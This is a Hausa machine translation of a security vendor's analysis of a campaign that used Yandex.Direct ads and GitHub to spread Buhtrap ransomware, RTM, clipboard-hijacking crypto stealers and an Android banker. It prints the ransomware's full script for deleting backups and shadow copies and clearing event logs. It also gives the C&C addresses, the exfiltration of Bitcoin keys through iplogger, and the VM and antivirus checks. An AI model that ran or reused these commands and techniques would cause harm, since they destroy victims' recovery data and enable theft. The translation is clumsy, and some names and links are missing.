Don kai hari ga masu lissafi a cikin harin yanar gizo, zaku iya amfani da takaddun aikin da suke nema akan layi. Wannan shine kusan abin da ƙungiyar yanar gizo ke yi a cikin ƴan watannin da suka gabata, suna rarraba sanannun bayan gida. и , da kuma masu ɓoyewa da software don satar cryptocurrencies. Yawancin hare-haren suna cikin Rasha. An kai harin ne ta hanyar sanya tallace-tallace mara kyau akan Yandex.Direct. An umurci waɗanda abin ya shafa zuwa gidan yanar gizon inda aka umarce su da su zazzage babban fayil ɗin da aka canza azaman samfuri na takarda. Yandex ya cire tallan ɓarna bayan gargaɗin mu.
A baya dai an yi ledar lambar tushe ta Buhtrap a kan layi ta yadda kowa zai iya amfani da shi. Ba mu da bayani game da samuwar lambar RTM.
A cikin wannan sakon za mu gaya muku yadda maharan suka rarraba malware ta amfani da Yandex.Direct kuma suka shirya shi akan GitHub. Shafin zai ƙare tare da nazarin fasaha na malware.
Buhtrap da RTM sun dawo cikin kasuwanci
Hanyar yadawa da wadanda abin ya shafa
Abubuwan biyan kuɗi daban-daban da aka bayar ga waɗanda abin ya shafa suna raba hanyar yaɗa ta gama gari. Duk fayilolin ƙeta da maharan suka ƙirƙira an sanya su cikin ma'ajiyar GitHub guda biyu daban-daban.
Yawanci, ma'ajin yana ƙunshi fayil ɗin ɓarna mai saukewa guda ɗaya, wanda ke canzawa akai-akai. Tun da GitHub yana ba ku damar duba tarihin canje-canje zuwa wurin ajiya, za mu iya ganin abin da aka rarraba malware a wani ɗan lokaci. Don shawo kan wanda aka azabtar ya sauke fayil ɗin ƙeta, an yi amfani da gidan yanar gizon blanki-shabloni24[.]ru, wanda aka nuna a cikin adadi na sama.
Zane na rukunin yanar gizon da duk sunayen fayilolin ɓarna suna bin ra'ayi guda ɗaya - nau'ikan, samfuri, kwangiloli, samfuran samfuri, da dai sauransu. Idan aka yi la'akari da cewa an riga an yi amfani da software na Buhtrap da RTM a cikin hare-hare kan masu ba da lissafi a baya, mun ɗauka cewa dabarun a cikin sabon kamfen iri daya ne. Abin tambaya kawai shine yadda wanda aka kashe ya isa wurin maharan.
Kamuwa da cuta
Aƙalla da yawa waɗanda abin ya shafa da suka ƙare a wannan rukunin yanar gizon sun sami sha'awar tallan mugunta. A ƙasa akwai misalin URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kamar yadda kuke gani daga hanyar haɗin yanar gizon, an buga banner ɗin akan halaltaccen dandalin lissafin kuɗi bb.f2[.]kz. Yana da mahimmanci a lura cewa banners sun bayyana akan shafuka daban-daban, duk suna da id ɗin yaƙin neman zaɓe iri ɗaya (blanki_rsya), kuma galibi suna da alaƙa da lissafin kuɗi ko sabis na taimakon doka. URL ɗin ya nuna cewa mai yuwuwar wanda aka azabtar ya yi amfani da buƙatar “zazzage fom ɗin daftari,” wanda ke goyan bayan hasashen mu na harin da aka yi niyya. A ƙasa akwai rukunin yanar gizon da banners suka bayyana da kuma tambayoyin neman daidai.
- zazzage fam ɗin daftari – bb.f2[.]kz
- samfurin kwangila - Ipopen[.]ru
- samfurin korafin aikace-aikacen - 77metrov[.] ru
- form ɗin yarjejeniya - blank-dogovor-kupli-prodazhi[.]ru
- samfurin kotun koli - zen.yandex[.] ru
- samfurin korafi - yurday[.]ru
- samfurin kwangilar form – Regforum[.]ru
- form na kwangila - assistentus[.]ru
- samfurin Apartment yarjejeniya - napravah[.] com
- samfurori na kwangilar doka - avito[.] ru
Mai yiwuwa an saita shafin blanki-shabloni24[.] ru don ƙaddamar da ƙima mai sauƙi na gani. Yawanci, tallan da ke nuna ƙwararrun rukunin yanar gizo tare da hanyar haɗi zuwa GitHub ba ya zama kamar wani abu mara kyau. Bugu da kari, maharan sun loda mugayen fayiloli zuwa maajiyar na wani dan lokaci kadan, mai yiwuwa a lokacin yakin neman zabe. Yawancin lokaci, ma'ajiyar GitHub tana ƙunshe da rumbun ajiyar zup mara komai ko kuma EXE mara komai. Don haka, maharan za su iya rarraba tallace-tallace ta hanyar Yandex.Direct a kan shafukan da aka fi ziyarta ta hanyar masu lissafi waɗanda suka zo don amsa takamaiman tambayoyin bincike.
Na gaba, bari mu dubi nau'ikan nau'ikan nau'ikan da aka rarraba ta wannan hanyar.
Biyan Kuɗi Analysis
Chronology na rarrabawa
Yaƙin neman zaɓe ya fara ne a ƙarshen Oktoba 2018 kuma yana aiki a lokacin rubutawa. Tunda ana samun gabaɗayan ma'ajiyar a bainar jama'a akan GitHub, mun tattara ingantaccen lokacin rarraba iyalai na malware daban-daban guda shida (duba adadi a ƙasa). Mun ƙara layin da ke nuna lokacin da aka gano hanyar haɗin banner, kamar yadda aka auna ta hanyar ESET telemetry, don kwatanta da tarihin git. Kamar yadda kake gani, wannan yana da alaƙa da kyau tare da wadatar kayan aiki akan GitHub. Za'a iya bayyana rashin daidaituwa a ƙarshen Fabrairu ta hanyar gaskiyar cewa ba mu da wani ɓangare na tarihin canji saboda an cire ma'auni daga GitHub kafin mu iya samun shi cikakke.
Hoto 1. Tarihin rarraba malware.
Takaddun Sa hannu na Code
Yaƙin neman zaɓe ya yi amfani da takaddun shaida da yawa. Wasu dangin malware fiye da ɗaya sun sanya hannu, wanda ke ƙara nuna cewa samfurori daban-daban na kamfen iri ɗaya ne. Duk da kasancewar maɓalli na sirri, masu aiki ba su sanya hannu kan tsarin binary ba kuma ba su yi amfani da maɓallin don duk samfuran ba. A ƙarshen Fabrairu 2019, maharan sun fara ƙirƙirar sa hannu mara inganci ta amfani da takaddun shaida mallakar Google wanda ba su da maɓalli na sirri.
Duk takaddun shaida da ke cikin yaƙin neman zaɓe da dangin malware da suka sanya hannu an jera su a cikin tebur da ke ƙasa.
Mun kuma yi amfani da waɗannan takaddun sa hannu na lambar don kafa hanyoyin haɗi tare da wasu iyalai na malware. Don yawancin takaddun shaida, ba mu sami samfuran da ba a rarraba ta wurin ajiyar GitHub ba. Duk da haka, an yi amfani da takardar shaidar TOV "MARIYA" don sanya hannu kan malware na botnet , adware da masu hakar ma'adinai. Yana da wuya cewa wannan malware yana da alaƙa da wannan kamfen. Mafi mahimmanci, an sayi takaddun shaida akan duhu.
Win32/Filecoder.Buhtrap
Bangare na farko da ya dauki hankalinmu shine sabuwar Win32/Filecoder.Buhtrap da aka gano. Wannan fayil ɗin binary ne na Delphi wanda wasu lokuta ana tattarawa. An rarraba shi a cikin Fabrairu-Maris 2019. Yana aiki kamar yadda ya dace da shirin ransomware - yana bincika faifan gida da manyan fayilolin cibiyar sadarwa kuma yana ɓoye fayilolin da aka gano. Ba ya buƙatar haɗin Intanet don lalata saboda baya tuntuɓar uwar garken don aika maɓallan ɓoyewa. Madadin haka, yana ƙara “alama” zuwa ƙarshen saƙon fansa, kuma yana ba da shawarar amfani da imel ko Bitmessage don tuntuɓar masu aiki.
Don ɓoye abubuwa masu mahimmanci kamar yadda zai yiwu, Filecoder.Buhtrap yana gudanar da zaren da aka ƙera don rufe software mai mahimmanci wanda zai iya samun buɗewar masu sarrafa fayil mai ɗauke da bayanai masu mahimmanci waɗanda zasu iya tsoma baki tare da ɓoyewa. Hanyoyin da aka yi niyya sune tsarin sarrafa bayanai (DBMS). Bugu da kari, Filecoder.Buhtrap yana goge fayilolin log da madogara don yin wahalar dawo da bayanai. Don yin wannan, gudanar da rubutun tsari a ƙasa.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap yana amfani da halaltaccen sabis na Logger na kan layi wanda aka ƙera don tattara bayanai game da maziyartan gidan yanar gizo. An yi niyya ne don bin diddigin wadanda abin ya shafa na ransomware, wanda alhakin layin umarni ne:
mshta.exe "javascript:document.write('');"
An zaɓi fayilolin don ɓoyewa idan basu dace da lissafin keɓewa uku ba. Da fari dai, fayilolin da ke da kari masu zuwa ba a ɓoye su: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys da .bat. Abu na biyu, duk fayilolin da cikakken hanyar ke ƙunshe da igiyoyin adireshi daga lissafin da ke ƙasa an cire su.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Na uku, ana kuma cire wasu sunayen fayil daga ɓoyewa, daga cikinsu akwai sunan fayil ɗin saƙon fansa. An gabatar da lissafin a ƙasa. Babu shakka, duk waɗannan keɓancewar an yi niyya ne don ci gaba da aiki da injin, amma tare da ƙarancin cancantar hanya.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Tsarin ɓoye fayil
Da zarar an kashe shi, malware yana haifar da maɓalli na RSA 512-bit. Sa'an nan kuma ana rufaffen keɓancewar saɓin mai zaman kansa (d) da modulus (n) tare da maɓalli mai lamba 2048-bit na jama'a (bayanin jama'a da modulus), cike da zlib, da tushe64. Ana nuna lambar da ke da alhakin wannan a hoto 2.
Hoto 2. Sakamakon rushewar Hex-Rays na tsarin tsara maɓalli na 512-bit RSA.
A ƙasa akwai misalin rubutu na fili tare da ƙirƙirar maɓalli na sirri, wanda alama ce da ke haɗe da saƙon fansa.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Ana ba da maɓallin jama'a na maharan a ƙasa.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
An rufaffen fayilolin ta amfani da AES-128-CBC tare da maɓallin 256-bit. Ga kowane fayil ɗin da aka rufaffen, ana samar da sabon maɓalli da sabon vector na farawa. Ana ƙara mahimman bayanan zuwa ƙarshen rufaffen fayil ɗin. Bari mu yi la'akari da tsarin rufaffen fayil ɗin.
Fayilolin da aka ɓoye suna da taken kai mai zuwa:
Bayanan fayil na tushen tare da ƙari na ƙimar sihirin VEGA an rufaffen rufaffen su zuwa 0x5000 bytes na farko. Ana haɗe duk bayanan ɓoyewa zuwa fayil mai tsari mai zuwa:
- Alamar girman fayil ɗin ta ƙunshi alamar da ke nuna ko fayil ɗin ya fi girma fiye da 0x5000 a girman girman.
- AES key blob = ZlibCompress (RSAEncrypt (maɓallin AES + IV, maɓallin jama'a na maɓallin RSA da aka samar))
- Maɓallin maɓallin RSA = ZlibCompress (RSAEncrypt (wanda aka ƙirƙira maɓalli na sirri na RSA, maɓallin jama'a na RSA mai wuya)))
Win32/ClipBanker
Win32/ClipBanker wani bangare ne wanda aka rarraba ta lokaci-lokaci daga ƙarshen Oktoba zuwa farkon Disamba 2018. Matsayinsa shine saka idanu abubuwan da ke cikin allo, yana neman adiresoshin walat ɗin cryptocurrency. Bayan da aka ƙayyade adireshin walat ɗin da aka yi niyya, ClipBanker ya maye gurbinsa da adireshin da aka yi imanin na masu aiki ne. Samfuran da muka bincika ba a kwali ba kuma ba a rufe su ba. Hanya ɗaya da ake amfani da ita don rufe hali ita ce ɓoyayyen kirtani. An rufaffen adiresoshin walat ɗin mai aiki ta amfani da RC4. Manufofin cryptocurrencies sune Bitcoin, Bitcoin tsabar kudi, Dogecoin, Ethereum da Ripple.
A lokacin da malware ke yadawa zuwa wallet ɗin Bitcoin na maharan, an aika da ɗan ƙaramin adadin zuwa VTS, wanda ke sanya shakku kan nasarar yaƙin neman zaɓe. Bugu da ƙari, babu wata shaida da ke nuna cewa waɗannan ma'amaloli suna da alaƙa da ClipBanker kwata-kwata.
Win32/RTM
An rarraba bangaren Win32/RTM na kwanaki da yawa a farkon Maris 2019. RTM ma'aikacin banki ne na Trojan da aka rubuta a Delphi, wanda ke nufin tsarin banki mai nisa. A cikin 2017, masu binciken ESET sun buga na wannan shirin, bayanin har yanzu yana da dacewa. A cikin Janairu 2019, Palo Alto Networks suma sun fito .
Buhtrap Loader
Na ɗan lokaci, ana samun mai saukewa akan GitHub wanda bai yi kama da kayan aikin Buhtrap na baya ba. Ya juya zuwa https://94.100.18[.]67/RSS.php?<some_id> don samun mataki na gaba da loda shi kai tsaye zuwa ƙwaƙwalwar ajiya. Zamu iya bambance halaye biyu na lambar mataki na biyu. A cikin URL na farko, RSS.php ya wuce Buhtrap bayan gida kai tsaye - wannan kofa ta baya tana kama da wacce ake samu bayan an fitar da lambar tushe.
Abin sha'awa, muna ganin kamfen da yawa tare da Buhtrap na bayan gida, kuma ana zargin masu aiki daban-daban ne ke gudanar da su. A wannan yanayin, babban bambanci shine cewa an ɗora bangon baya kai tsaye zuwa ƙwaƙwalwar ajiya kuma baya amfani da tsarin da aka saba da shi tare da tsarin ƙaddamar da DLL wanda muka yi magana game da shi. . Bugu da ƙari, masu aiki sun canza maɓallin RC4 da aka yi amfani da su don ɓoye zirga-zirgar hanyar sadarwa zuwa uwar garken C&C. A yawancin yakin da muka gani, masu aiki ba su damu da canza wannan maɓallin ba.
Na biyu, mafi rikitarwa hali shi ne cewa RSS.php URL an wuce zuwa wani loda. Ya aiwatar da wasu ɓarna, kamar sake gina tebirin shigo da kuzari mai ƙarfi. Manufar bootloader shine tuntuɓar uwar garken C&C [.]com/api/F27F84EDA4D13B15/2, aika rajistan ayyukan kuma jira amsa. Yana aiwatar da amsa a matsayin kumbura, yana loda shi cikin ƙwaƙwalwar ajiya kuma yana aiwatar da shi. Nauyin da muka gani yana aiwatar da wannan lodin shi ne Buhtrap na baya, amma akwai yuwuwar samun wasu abubuwan.
Android/Spy.Banker
Abin sha'awa, an kuma sami wani sashi na Android a cikin ma'ajiyar GitHub. Ya kasance a babban reshe na kwana ɗaya kawai - Nuwamba 1, 2018. Baya ga bugawa akan GitHub, ESET telemetry bai sami wata shaida ta rarraba wannan malware ba.
An shirya sashin a matsayin Kunshin Aikace-aikacen Android (APK). Ya ruɗe sosai. Ana ɓoye halayen mugunta a cikin ɓoyayyen JAR da ke cikin apk. An rufaffen shi da RC4 ta amfani da wannan maɓalli:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Ana amfani da maɓalli iri ɗaya da algorithm don ɓoye kirtani. JAR yana cikin APK_ROOT + image/files. Baiti 4 na farko na fayil ɗin ya ƙunshi tsayin ɓoyayyen JAR, wanda ke farawa nan da nan bayan filin tsayi.
Bayan mun lalata fayil ɗin, mun gano cewa Anubis ne - a baya banki don Android. Malware yana da fasali masu zuwa:
- rikodin makirufo
- daukar hotunan kariyar kwamfuta
- samun haɗin gwiwar GPS
- keylogger
- boye bayanan na'urar da bukatar fansa
- aika spam
Abin sha'awa, ma'aikacin banki ya yi amfani da Twitter a matsayin tashar sadarwa ta madadin don samun wani uwar garken C&C. Samfurin da muka bincika yayi amfani da asusun @JonesTrader, amma a lokacin bincike an riga an toshe shi.
Ma'aikacin banki ya ƙunshi jerin aikace-aikacen da aka yi niyya akan na'urar Android. Ya fi tsayin lissafin da aka samu a cikin binciken Sophos. Jerin ya ƙunshi aikace-aikacen banki da yawa, shirye-shiryen siyayya ta kan layi kamar Amazon da eBay, da sabis na cryptocurrency.
MSIL/ClipBanker.IH
Bangare na ƙarshe da aka rarraba a matsayin wani ɓangare na wannan kamfen shine .NET Windows executable, wanda ya bayyana a cikin Maris 2019. Yawancin nau'ikan da aka yi nazari an tattara su tare da ConfuserEx v1.0.0. Kamar ClipBanker, wannan bangaren yana amfani da allo. Burinsa shine nau'in cryptocurrencies da yawa, da kuma tayi akan Steam. Bugu da ƙari, yana amfani da sabis na IP Logger don satar maɓallin WIF na sirri na Bitcoin.
Hanyoyin Kariya
Baya ga fa'idodin da ConfuserEx ke bayarwa wajen hana gyara kurakurai, zubar da jini, da kuma lalata, sashin ya haɗa da ikon gano samfuran riga-kafi da injina.
Don tabbatar da cewa yana aiki a cikin injin kama-da-wane, malware yana amfani da ginannen layin umarni na WMI na Windows (WMIC) don neman bayanin BIOS, wato:
wmic bios
Sa'an nan shirin yana nazarin fitar da umarni kuma yana neman kalmomi masu mahimmanci: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Don gano samfuran riga-kafi, malware suna aika buƙatun Kayan Gudanar da Windows (WMI) zuwa Cibiyar Tsaro ta Windows ta amfani da ManagementObjectSearcher API kamar yadda aka nuna a ƙasa. Bayan yanke hukunci daga base64 kiran yayi kama da haka:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Hoto 3. Tsari don gano samfuran riga-kafi.
Bugu da ƙari, malware yana bincika ko , kayan aiki don kariya daga harin allo, kuma, idan yana gudana, yana dakatar da duk zaren a cikin wannan tsari, ta haka yana kashe kariyar.
Dagewa
Sigar malware da muka yi nazarin kwafin kanta a ciki %APPDATA%googleupdater.exe kuma ya saita sifa ta “boye” don adireshin google. Sannan ta canza darajar SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell a cikin rajistar Windows kuma yana ƙara hanyar updater.exe. Ta wannan hanyar, za a aiwatar da malware a duk lokacin da mai amfani ya shiga.
Halin mugunta
Kamar ClipBanker, malware yana lura da abubuwan da ke cikin allo kuma suna neman adiresoshin walat ɗin cryptocurrency, kuma idan an same su, suna maye gurbinsa da ɗaya daga cikin adiresoshin mai aiki. A ƙasa akwai jerin adiresoshin da aka yi niyya bisa abin da aka samo a lambar.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Ga kowane nau'in adireshin akwai madaidaicin magana ta yau da kullun. Ana amfani da ƙimar STEAM_URL don kai hari akan tsarin Steam, kamar yadda ake iya gani daga magana ta yau da kullun da ake amfani da ita don ayyana cikin ma'ajin:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
tashar Exfiltration
Baya ga maye gurbin adireshi a cikin buffer, malware yana yin hari ga maɓallan WIF masu zaman kansu na Bitcoin, Bitcoin Core da Electrum Bitcoin wallets. Shirin yana amfani da plogger.org a matsayin tashar exfiltration don samun maɓalli na sirri na WIF. Don yin wannan, masu aiki suna ƙara bayanan maɓalli na sirri zuwa mai amfani-Agent HTTP header, kamar yadda aka nuna a ƙasa.
Hoto 4. IP Logger console tare da bayanan fitarwa.
Masu aiki ba su yi amfani da iplogger.org don fitar da wallet ba. Wataƙila sun yi amfani da wata hanya ta dabam saboda ƙayyadaddun halaye 255 a filin User-Agentwanda aka nuna a cikin mahaɗin yanar gizo na IP Logger. A cikin samfuran da muka yi nazari, an adana sauran uwar garken fitarwa a cikin canjin yanayi DiscordWebHook. Abin mamaki, wannan canjin yanayi ba a sanya shi a ko'ina a cikin lambar ba. Wannan yana nuna cewa malware ɗin har yanzu yana kan haɓakawa kuma ana sanya mai canzawa zuwa injin gwajin ma'aikaci.
Akwai wata alama da ke nuna cewa shirin yana ci gaba. Fayil ɗin binary ya ƙunshi URLs iplogger.org guda biyu, kuma duka biyun ana tambayar su lokacin da aka fitar da bayanai. A cikin buƙatun zuwa ɗaya daga cikin waɗannan URLs, ƙimar da ke cikin filin Mai Magana tana gaba da “DEV /”. Mun kuma sami sigar da ba a tattara ta ta amfani da ConfuserEx, mai karɓar wannan URL mai suna DevFeedbackUrl. Dangane da sunan canjin yanayi, mun yi imanin cewa masu aiki suna shirin yin amfani da halaltaccen sabis na Discord da tsarin satar yanar gizo don satar walat ɗin cryptocurrency.
ƙarshe
Wannan kamfen misali ne na amfani da halaltattun sabis na talla a cikin hare-haren yanar gizo. Makircin ya shafi kungiyoyin Rasha ne, amma ba za mu yi mamakin ganin irin wannan harin ta hanyar amfani da ayyukan da ba na Rasha ba. Don guje wa sasantawa, masu amfani dole ne su kasance da kwarin gwiwa a kan tushen tushen software da suke zazzagewa.
Ana samun cikakken jerin alamomin sasantawa da halayen MITER ATT&CK a .
source: www.habr.com